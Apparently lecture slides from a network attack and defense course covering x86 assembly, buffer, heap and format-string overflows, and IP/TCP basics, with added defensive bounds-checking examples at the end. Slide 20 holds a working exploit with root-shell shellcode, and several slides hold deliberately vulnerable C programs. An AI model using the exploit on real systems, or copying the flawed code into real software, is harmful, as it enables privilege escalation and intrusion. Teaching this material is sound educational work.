




Slide 1: Computer Network Attack and Defense Technology, Lecture 3

Slide 2: Outline
- Project topics
- Assembly language
- Exploitation
- Stack overflow attack
- Heap overflow attack
- IP network review

Slide 3: Possible project titles
Requirements: no plagiarism; every cited source must be referenced; use the standard academic report format; groups of four (may also be done individually); submit the topic outline in week 5 with title, content summary and a brief analysis of the chapters.
Topics:
- Worms: vulnerability source, vulnerability principle, attack method, attack characteristics, consequences, detection methods (Code Red, Conficker, Slammer)
- Network vulnerability scanning: use the nessus tool to scan and analyse the School of Software lab machines, and write a report
- Network attack: use the metasploit tool to run attack tests against the School of Software lab machines, and write a report
- Survey of cross-site scripting vulnerabilities
- Report on the development trends of network security technology
- Survey of the state of firewall technology
- Survey of the state of network intrusion detection and prevention systems
- Architecture of high-speed network intrusion detection and prevention systems
- Mobile terminal security technology (one chosen topic)
- Operating system security technology (one chosen topic)
- Cloud computing security technology (one chosen topic)
- Other network-security-related topics

Slide 4: Overview of the 80x86 family assembly language
Numbers:
    1 bit:       0 or 1
    1 nibble:    0000 (4 bits)
    1 byte:      00000000 (2 nibbles, 8 bits)
    1 half word: 0000000000000000 (2 bytes, 4 nibbles, 16 bits)
    1 word:      00000000000000000000000000000000 (4 bytes, 32 bits)

Slide 5: Intel registers
General purpose registers: EAX accumulator register, EBX base register, ECX counter register, EDX data register.
Index registers (32-bit, mainly used for string instructions): EDI destination index, ESI source index.
Pointer register: EIP, the instruction pointer, points to the current instruction the processor is reading.
Stack registers: EBP and ESP are used when dealing with the stack. ESP is the stack pointer, EBP the stack base pointer.
EFLAGS: several bit flags used for comparisons and memory segments; can be ignored most of the time since no direct access is needed.
Segment registers: store segment and offset.

Slide 6: Types of operands
Immediate: a number that is known at compilation and will always be the same, e.g. 20 or 'A'.
Register: any general purpose or index register, e.g. EAX or ESI.
Memory: a variable which is stored in memory.

Slide 7: Assembly instructions
MOV moves a value from one place to another: mov destination, source
    mov eax, 10   ; put 10 into eax
    mov ebx, 20   ; put 20 into ebx
    mov ecx, 30   ; put 30 into ecx
    mov edx, 40   ; put 40 into edx
In assembler anything after a ; (semicolon) is ignored, which is very useful for commenting your code.

Slide 8: push and pop, call and ret
PUSH puts a piece of data onto the top of the stack. Syntax: push data
POP takes the piece of data from the top of the stack into a specified register or variable. Syntax: pop register (or variable)
CALL calls a function, jumping execution to the address in the location operand; the location can be relative or absolute. The address of the instruction following the call is pushed onto the stack so that execution can return there later.
RET returns from a function, popping the return address from the stack and jumping execution there.
Example:
    push ecx   ; put ecx on the stack
    push eax   ; put eax on the stack
    pop ecx    ; put value from stack into ecx
    pop eax    ; put value from stack into eax

Slide 9: Stack frame
    high address (0xffffffff)
      Caller frame
      Function arguments
      Return address (ret), the saved instruction pointer (SIP)
      Saved frame pointer (SFP)      <- frame pointer (EBP)
      Local data 1
      Local data 2                   <- stack pointer (ESP), top of stack
    low address (0x00000000)
Stack growth is toward lower addresses.

Slide 10: Instructions
Square brackets dereference an operand as a pointer: mov [ebx+12], eax treats ebx+12 as a pointer and writes eax to where it points.
lea loads the effective address of the source operand into the destination operand, similar to the address-of operator (&) in C:
    lea ecx, [ebx+8]   ; load the address ebx+8 into ecx
int calls an interrupt processing subroutine: int interrupt_number
    int 21h   ; calls DOS service
    int 10h   ; calls the Video BIOS interrupt

Slide 11: Control flow
    jmp ALabel
    . . .
    ALabel:
JA jumps if the first number was above the second number
JAE same as above, but will also jump if they are equal
JB jumps if the first number was below the second
JBE same as above, but will also jump if they are equal
JNA jumps if the first number was NOT above (JBE)
JNAE jumps if the first number was NOT above or the same as (JB)
JNB jumps if the first number was NOT below (JAE)
JNBE jumps if the first number was NOT below or the same as (JA)
JZ jumps if the two numbers were equal (jump if the zero flag is set)
JE same as JZ, just a different name
JNZ jumps if the two numbers are NOT equal
JNE same as above
JC jumps if the carry flag is set
JG jumps if greater than
JGE jumps if greater than or equal to
CMP compares a value. Syntax: cmp destination, source. It compares the destination operand with the source, setting flags for use with a conditional jump instruction.

Slide 12: Important instructions
ADD operand1, operand2 adds operand2 to operand1; the answer is stored in operand1. Immediate data cannot be used as operand1 but can be used as operand2.
SUB operand1, operand2 subtracts operand2 from operand1. Immediate data cannot be used as operand1 but can be used as operand2.
xor, or, and; inc, dec
MUL multiplies two unsigned integers (always positive); IMUL multiplies two signed integers (either positive or negative).
DIV divides two unsigned integers (always positive); IDIV divides two signed integers (either positive or negative).

Slide 13: helloworld.s
    BITS 32             ; tell nasm this is 32-bit code
    jmp short one       ; jump down to a call at the end
    two:
    ; ssize_t write(int fd, const void *buf, size_t count);
      pop ecx           ; pop the return address (string ptr) into ecx
      xor eax, eax      ; zero out full 32 bits of eax register
      mov al, 4         ; write syscall #4 to the low byte of eax
      xor ebx, ebx      ; zero out ebx
      inc ebx           ; increment ebx to 1, STDOUT file descriptor
      xor edx, edx
      mov dl, 15        ; length of the string
      int 0x80          ; do syscall: write(1, string, 15)
    ; void _exit(int status);
      mov al, 1         ; exit syscall #1, the top 3 bytes are still zeroed
      dec ebx           ; decrement ebx back down to 0 for status = 0
      int 0x80          ; do syscall: exit(0)
    one:
      call two          ; call back upwards to avoid null bytes
      db "Hello, world!", 0x0a, 0x0d   ; with newline and carriage return bytes

Slide 14: Assembly code to machine code
nasm: the nasm assembler converts assembly language into machine code.
ndisasm: converts machine code into assembly code.
hexdump: dumps the machine code in hex output format.

Slide 15: helloworld1.s
    BITS 32             ; tell nasm this is 32-bit code
      call mark_below   ; call below the string to the instructions
      db "Hello, world!", 0x0a, 0x0d   ; with newline and carriage return bytes
    mark_below:
    ; ssize_t write(int fd, const void *buf, size_t count);
      pop ecx           ; pop the return address (string ptr) into ecx
      mov eax, 4        ; write syscall #
      mov ebx, 1        ; STDOUT file descriptor
      mov edx, 15       ; length of the string
      int 0x80          ; do syscall: write(1, string, 15)
    ; void _exit(int status);
      mov eax, 1        ; exit syscall #
      mov ebx, 0        ; status = 0
      int 0x80          ; do syscall: exit(0)
Reference: nasm.pdf

Slide 16: Exploitation
A program is designed by people to follow a predefined flow. Exploitation is using a clever way to make the program do what you want it to do, not what the designer/programmer wanted it to do.
The LaMacchia loophole: a loophole in the US legal system, 1993, MIT student David LaMacchia (hacker).

Slide 17: Exploitation
Most program exploits have to do with memory corruption: take control of the running program's flow and hijack it to run the bad code, that is, execution of arbitrary code. Examples: buffer overflow, heap overflow, format string exploits, integer overflow.

Slide 18: Buffer overflows
C is an unsafe language: once memory is allocated, there is no safeguard to ensure that data is stored only in the allocated memory. (buffer_overflow.pdf)
    strcpy(searchingstring, argv[1]);

Slide 19: Buffer overflows
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[]) {
        int value = 5;
        char buffer_one[8], buffer_two[8];

        strcpy(buffer_one, "one"); /* put "one" into buffer_one */
        strcpy(buffer_two, "two"); /* put "two" into buffer_two */

        printf("[BEFORE] buffer_two is at %p and contains %s\n", buffer_two, buffer_two);
        printf("[BEFORE] buffer_one is at %p and contains %s\n", buffer_one, buffer_one);
        printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

        printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", (int)strlen(argv[1]));
        strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

        printf("[AFTER] buffer_two is at %p and contains %s\n", buffer_two, buffer_two);
        printf("[AFTER] buffer_one is at %p and contains %s\n", buffer_one, buffer_one);
        printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);
    }
Show the memory content when the program runs. (buffer_overflow.pdf)

Slide 20: Making use of a buffer overflow
Program crashes are annoying, but to a hacker they indicate a possible way in. exploit_notesearch.c corrupts the memory and controls the execution flow; the overflow is passed as a single command line argument string. When the program runs it spawns a root shell, providing full control of the computer. (note_search_to_root.pdf)
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>

    char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
    "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
    "\xe1\xcd\x80";

    int main(int argc, char *argv[]) {
        unsigned int i, *ptr, ret, offset = 270;
        char *command, *buffer;

        command = (char *) malloc(200);
        bzero(command, 200); // zero out the new memory

        strcpy(command, "./notesearch \'"); // start command buffer
        buffer = command + strlen(command); // set buffer at the end

        if(argc > 1) // set offset
            offset = atoi(argv[1]);

        ret = (unsigned int) &i - offset; // set return address

        for(i = 0; i < 160; i += 4) // fill buffer with return address
            *((unsigned int *)(buffer + i)) = ret;
        memset(buffer, 0x90, 60); // build NOP sled
        memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);

        strcat(command, "\'");

        system(command); // run exploit
        free(command);
    }

Slide 21: Stack-based buffer overflow
exploit_notesearch.c is one kind of stack-based buffer overflow. auth_overflow.c: simple testing works fine, but access can be gained without the right input. (buffer_overflow.pdf)
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int check_authentication(char *password) {
        int auth_flag = 0;
        char password_buffer[16];

        strcpy(password_buffer, password);

        if(strcmp(password_buffer, "brillig") == 0)
            auth_flag = 1;
        if(strcmp(password_buffer, "outgrabe") == 0)
            auth_flag = 1;

        return auth_flag;
    }

    int main(int argc, char *argv[]) {
        if(argc < 2) {
            printf("Usage: %s <password>\n", argv[0]);
            exit(0);
        }
        if(check_authentication(argv[1])) {
            printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
            printf("      Access Granted.\n");
            printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
        } else {
            printf("\nAccess Denied.\n");
        }
    }

Slide 22: Memory organization
    high address (0xffffffff)
      Stack   temporary storage for local function variables; grows downward
      Heap    dynamically allocated, long term storage; grows upward
      BSS     uninitialized data (block started by symbol); read/write access
      DATA    initialized data; read/write access
      Text    compiled program code
    low address (0x00000000)
BSS and DATA: data in these segments is executable.

Slide 23: Stack frame (the same diagram as slide 9)

Slide 24: Stack operation on function exit
1. Set the stack pointer (ESP) to the same value as the frame pointer (EBP).
2. Pop the frame pointer (EBP) from the stack; the stack pointer (ESP) moves four bytes upward. Now ESP points to RET (the saved instruction pointer).
3. Return: pop the saved instruction pointer; the stack pointer (ESP) moves four bytes upward.

Slide 25: Stack-based buffer overflow
What happens if the password_buffer[16] and auth_flag declarations are reversed? (buffer_overflow.pdf) main() is unchanged from slide 21; only check_authentication differs:
    int check_authentication(char *password) {
        char password_buffer[16];
        int auth_flag = 0;

        strcpy(password_buffer, password);

        if(strcmp(password_buffer, "brillig") == 0)
            auth_flag = 1;
        if(strcmp(password_buffer, "outgrabe") == 0)
            auth_flag = 1;

        return auth_flag;
    }

Slide 26: Off-by-one vulnerability
(The slide first repeats the auth_overflow.c listing of slide 25, then shows this program.)
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int vulfnc(char *arg);

    int main(int argc, char *argv[]) {
        if(strlen(argv[1]) > 32) {
            printf("Input string too long\n");
            exit(1);
        }
        vulfnc(argv[1]);
        return 0;
    }

    int vulfnc(char *arg) {
        char smallbuf[32];
        strcpy(smallbuf, arg);
        printf("%s\n", smallbuf);
        return 0;
    }
What is the problem with this program?

Slide 27: Using scripts to make attacks easier
The bash shell and Perl are common to most Unix-based machines. Tell Perl to execute the commands found between single quotes:
    /hacking/booksrc $ perl -e 'print "A" x 20;'
    AAAAAAAAAAAAAAAAAAAA
Any character can be written as \x followed by its hexadecimal value, which also works for non-printable characters. 'A' = 0x41, so:
    /hacking/booksrc $ perl -e 'print "\x41" x 20;'
    AAAAAAAAAAAAAAAAAAAA

Slide 28: Perl string concatenation
String concatenation is done in Perl with a period:
    /hacking/booksrc $ perl -e 'print "A" x 20 . "BCD" . "\x61\x66\x67\x69" x 2 . "Z";'
    AAAAAAAAAAAAAAAAAAAABCDafgiafgiZ
A shell command can be executed like a function using the $() form (command substitution). (perl_example.pdf) Command substitution and Perl can be combined to quickly generate an overflow buffer on the fly.

Slide 29: Shellcode
Overflow a buffer into the return address, inject your own instructions into memory and then return execution there. The original meaning is to spawn a shell (root shell) used to control the machine; it extends to spawning any method that can be used to control the machine, e.g. opening a connect-back port. (shellcode_example.pdf)
When new instructions can be injected and execution can be controlled with a buffer overflow, the original design is void: the program can be made to do things it was never programmed to do.
Layout of the overflow buffer: NOP sled | shellcode | repeated return address

Slide 30: Using the environment
Sometimes the buffer is too small to hold the shellcode. Unix/Linux environment variables live on the stack, so the shellcode can be placed there. (shellcode_environment.pdf)

Slide 31: Heap-based overflow
Overrun memory allocated from the heap and modify some file or variable used by the program; the changed file or variable content then takes effect, e.g. a password file or a runnable program. (heap_overflow.pdf)

Slide 32: Overflowing function pointers
What is a function pointer?
    struct user {
        int uid;
        int credits;
        int high_score;
        char name[100];
        int (*current_game) ();
    };
    struct user player;
(overflow_function.pdf)

Slide 33: Format string overflow
    printf("A is %d and is at %08x. B is %x.\n", A, &A, B);
Stack layout at the call:
    top of stack:     address of format string
                      value of A
                      address of A
    bottom of stack:  value of B

Slide 34: What happens if not enough parameters are passed?
    printf("A is %d and is at %08x. B is %x.\n", A, &A);
B still gets printed: "B is b7fdbff4" (whatever happens to be on the stack). (format_string.pdf)
    top of stack:     address of format string
                      value of A
    bottom of stack:  address of A

Slide 35: The format string vulnerabilities
    printf("%s", my_string)
    printf(my_string)
Which is better? Which has a problem? (format_string_vulnerabilities.pdf)

Slide 36: Read/write arbitrary memory addresses
Any memory address can be read, and any memory address can be written. (format_string_read_write_any_memory.pdf)

Slide 37: Outline
Basic networking. Some network attacks: host-to-host datagram protocols, TCP spoofing. Attacking network infrastructure: routing, DNS.

Slide 38: Core network
ISPs and the Internet infrastructure. Local and interdomain routing: RIP, OSPF (intra-domain routing); BGP for routing announcements (inter-domain routing). DNS (Domain Name System): IP address to name ().

Slide 39: TCP protocol stack
Each host runs Application, Transport, Network and Link layers; the application protocol, TCP protocol, IP protocol and data link run between peers, with IP routers in the middle providing network access (IP protocol, data link).

Slide 40: Data formats
    Application         message   data
    Transport (TCP/UDP) segment   TCP header | data
    Network (IP)        packet    IP header | TCP header | data
    Link layer          frame     Ethernet header | IP header | TCP header | data | Ethernet trailer

Slide 41: Internet Protocol (IP)
Connectionless, unreliable, best effort. Note: source and destination ports are not part of the IP header; they belong to the transport layer.
IP header fields:
    Version | Header Length | Type of Service | Total Length
    Identification | Flags | Fragment Offset
    Time to Live | Protocol | Header Checksum
    Source Address of Originating Host
    Destination Address of Target Host
    Options | Padding
    IP Data

Slide 42: IP routing
Internet routing uses the IP address: 32 bits for IPv4, 128 bits for IPv6. Several hosts for a route. Diagram: Meg sends a packet (source, destination) to Tom through the ISP gateway/router.

Slide 43: IP protocol functions (summary)
Routing: an IP host knows the location of its router (gateway); an IP gateway must know the route to other networks.
Fragmentation and reassembly: if the max packet size is less than the user data size.
Error reporting: an ICMP packet is sent to the source if a packet is dropped.
TTL field: decremented after every hop; the packet is dropped if TTL = 0. This prevents infinite loops.

Slide 44: Problem: no source IP authentication
The client is trusted to embed the correct source IP, which is easy to override using raw sockets. Libnet is a library for formatting raw packets with arbitrary IP headers. Anyone who owns their machine can send packets with an arbitrary source IP; the response will be sent back to the forged source IP.
Implications: anonymous DoS attacks; anonymous infection attacks (e.g. the Slammer worm).

Slide 45: User Datagram Protocol (UDP)
Unreliable transport on top of IP: no acknowledgment, no congestion control.

Slide 46: Transmission Control Protocol
Connection-oriented, preserves order. Sender: break data into packets, attach packet numbers. Receiver: acknowledge receipt, lost packets are resent, reassemble packets in correct order. Analogy: mailing a book, mail each page and reassemble the book.

Slide 47: TCP header
Source port, destination port, SEQ number, ACK number, other fields, flags: URG, ACK, PSH, RST, SYN, FIN.

Slide 48: Review: TCP handshake
    Client (C)                     Server (S)
      SYN          -------->         Listening
      <--------    SYN/ACK           Store SNC, SNS; Wait
      ACK          -------->         Established
(The slide text is cut off here in the source.)
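The auth_overflow.c listing (slide 21) and the off-by-one program (slide 26) both fail for the same reason: the length of the input is never checked against the buffer, or is checked with the wrong comparison. The following is an added example, not code from the slides or from the book they draw on; it puts the slide's `> 32` check beside the correct one and shows a hardened check_authentication. The names fits_buffer, offbyone_check_accepts and check_authentication_safe are this example's own.

```c
/* Added example: bounds checks for the auth_overflow.c and off-by-one
 * slides. Not from the lecture material. */
#include <stdio.h>
#include <string.h>

#define PASSWORD_CAP 16   /* same size as password_buffer[16] on the slide */
#define SMALLBUF_CAP 32   /* same size as smallbuf[32] on the slide */

/* The slide's check, strlen(arg) > 32, accepts a 32-character string;
 * strcpy then writes 33 bytes (32 chars plus NUL) into smallbuf[32]. */
int offbyone_check_accepts(const char *arg, size_t cap) {
    return strlen(arg) > cap ? 0 : 1;
}

/* Correct check: the NUL terminator needs a byte too, so the string
 * length must be strictly less than the capacity. */
int fits_buffer(const char *arg, size_t cap) {
    return strlen(arg) < cap;
}

/* Hardened check_authentication: refuse over-long input before copying,
 * so auth_flag (adjacent to the buffer in the vulnerable layout) can
 * never be overwritten. Returns 1 for a valid password, 0 otherwise. */
int check_authentication_safe(const char *password) {
    int auth_flag = 0;
    char password_buffer[PASSWORD_CAP];

    if (!fits_buffer(password, sizeof password_buffer))
        return 0;                    /* too long: deny, do not copy */

    /* Safe now: strlen(password) < 16, so the copy including NUL fits. */
    memcpy(password_buffer, password, strlen(password) + 1);

    if (strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if (strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;
    return auth_flag;
}

int main(void) {
    /* Constructed inputs: 32 'A's is the boundary case for smallbuf[32]. */
    const char *thirty_two = "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA";
    printf("off-by-one check accepts 32 chars: %d\n",
           offbyone_check_accepts(thirty_two, SMALLBUF_CAP));
    printf("correct check accepts 32 chars:    %d\n",
           fits_buffer(thirty_two, SMALLBUF_CAP));
    printf("brillig -> %d, 20 A's -> %d\n",
           check_authentication_safe("brillig"),
           check_authentication_safe("AAAAAAAAAA" "AAAAAAAAAA"));
    return 0;
}
```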
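For the format string slides (33 to 35), the following added example, not code from the slides, counts how many arguments a format string makes printf read from the stack, which is exactly what goes wrong when a user-supplied string is passed as the format, and shows the printf("%s", s) form beside it. The names count_conversions, format_is_inert and print_untrusted are this example's own.

```c
/* Added example for the format string slides; not from the lecture material. */
#include <stdio.h>
#include <string.h>

/* Number of arguments printf would pull off the stack for fmt.
 * "%%" is a literal percent and consumes nothing. Flags, width and
 * precision digits are skipped; a '*' width or precision costs one extra
 * argument on top of the conversion itself. */
int count_conversions(const char *fmt) {
    int n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                  /* "%%" */
        while (*p && strchr("-+ #0123456789.*", *p)) {
            if (*p == '*') n++;                   /* '*' reads an int arg */
            p++;
        }
        if (*p == '\0') break;                    /* truncated spec at end */
        n++;                                      /* the conversion itself */
    }
    return n;
}

/* 1 when a user-controlled string would consume no arguments if it were
 * (wrongly) used as the format: the case where printf(s) happens to be
 * harmless. Anything else would read from the stack, as on slide 34. */
int format_is_inert(const char *s) {
    return count_conversions(s) == 0;
}

/* Correct way to print attacker-controlled text: the format is a constant
 * and the string is data, so "%x" or "%n" inside it is printed, not
 * interpreted. Returns the number of characters written. */
int print_untrusted(const char *s) {
    return printf("%s\n", s);
}

int main(void) {
    /* Constructed inputs mirroring the slides' examples. */
    const char *slide_fmt = "A is %d and is at %08x. B is %x.\n";
    printf("slide format consumes %d args\n", count_conversions(slide_fmt));
    printf("\"100%%\" consumes %d args\n", count_conversions("100%%"));
    print_untrusted("%x %x %x %n");              /* printed literally */
    return 0;
}
```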